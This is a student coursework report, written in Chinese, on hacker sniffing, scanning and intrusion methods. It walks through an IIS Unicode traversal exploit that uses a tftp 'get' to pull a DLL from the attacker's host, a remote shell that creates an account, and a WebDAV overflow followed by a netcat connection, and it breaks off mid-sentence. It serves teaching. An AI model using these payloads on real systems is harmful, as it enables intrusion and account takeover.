《网络安全技术》课程考查大作业 (9).docVIP

大连外国语大学软件学院 成绩评定： 成绩评定： 专业：信息管理与信息系统（英日）年级：13级 班级： 21班 姓名： 栾鑫玉 学号：12 黑客常用网络侦听、网络扫描、网络入侵方法简介 网络监听：网络监听的目的是截获通信的内容，监听的手段是对协议进行分析。 监听方法： 1.网络监听工具Sniffer pro：在同一网段内的主机与其他计算机进行数据传输或ping通的时候利用Sniffer pro软件进行监听，对通过Sniffer pro截获的数据包进行分析。 2.密码监听工具 pswmonitor：可以监听局域网内任意一台电脑所登录的网页邮箱、使用POP3收取的信件以及其它登录帐号及密码（包括部分网络游戏），并将密码显示、保存或发送到黑客指定的邮箱。该木马运行后，在系统目录下释放病毒主程序pswmonitor.exe，以及多个网络模块及驱动模块。修改注册表，以实现程序的开机自启。 3.密码监听工具 Win Sniffer 4.嗅探经典 Iris 网络扫描：网络扫描是黑客攻击五部曲中第二步踩点扫描中的扫描，一般分成两种策略，一种是主动式策略，另一种是被动式策略。 被动式策略是基于主机之上，对系统中不合适的设置，脆弱的口令以及其他同安全规则抵触的对象进行检查。 被动式扫描不会对系统造成破坏，而主动式扫描对系统进行模拟攻击，可能会对系统造成破坏。 主动式扫描一般可以分成： 1、活动主机探测 2、ICMP查询 3、网络PING扫描 4、端口扫描 5、标识UDP和TCP服务 6、指定漏洞扫描 7、综合扫描 被动扫描常用方法有： 1.系统用户扫描 2.开放端口扫描 3.共享目录扫描 4.利用TCP协议进行端口扫描 5.扫描漏洞 第一种入侵方法 2.1 方法原理 利用Unicode漏洞入侵对方系统 2.2 入侵过程 使用工具软件tftpd32.exe建立服务器，将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序，主界面如下图2-1所示。 图2-1 在本地主机建立好了TFTP服务器 将本地浏览器打开，输入字符 “ 09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”在浏览器中执行。如下图2-2所示。 图2-2 当前，idq.dll已经发送到目标主机当中去了。为了确保，查看一下scripts目录，是否真的上传成功了。在本地浏览器中输入字符 “09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir” 如下图2-3所示。 图2-3 说明已经成功的在scripts目录中上传了一个idq.dll文件，拷贝ispc.exe文件到本地计算机的C盘根目录，如下图2-4。 图2-4 在DOS命令行下执行命令：输出两次cd..，使路径回到C盘根目录下，接着输入字符“ispc.exe 09/scripts/idq.dll”，来登录对方的DOS命令，如下图2-5、2-6所示。 图2-5 图2-6 已经连接到对方的DOS命令，接着验证是否真的进入了。 在DOS命令行下输入ipconfig，然后进入如下界面，如图2-7所示。 图2-7 连入的IP地址为10，说明已经登入对方的DOS命令。接下来就可以在对方DOS命令下进行管理员的操作了。例如在对方的计算机上利用net user创建一个用户，用户名为luanxinyu，密码为123456。如下图2-8所示。 图2-8 成功在对方电脑上创建了密码为123456的账户luanxinyu。 成功入侵目标机并完成一定操作。 2.3 入侵结果 可以通过DOS命令进行管理员的所有操作，如添加管理员。 第二种入侵方法 3.1 方法原理 WebDav远程溢出攻击 3.2 入侵过程 将nc.exe和webdavx3.exe两个应用程序拷贝到C盘根目录下，如下图3-1所示。 图3-1 打开DOS面板，输入两次cd..回到C盘根目录的位置，输字符webdavx3.exe 10，运行webdavx3这个程序，10是目标机的IP地址，如下图3-2所示。 图3-2 运行结果显示该程序已经过期，将系统时间改到一个较早的时间，再重复之前的操作，如图3-3、3-4所示。 图3-3 图3-4 已经开始攻击，但是程序运行时间过长，出现卡顿现象，按Ctrl+c。该程序在对方的计算机上开了一个端口7788，继续攻击，输入字符“nc -vv 10 7788”连入对方的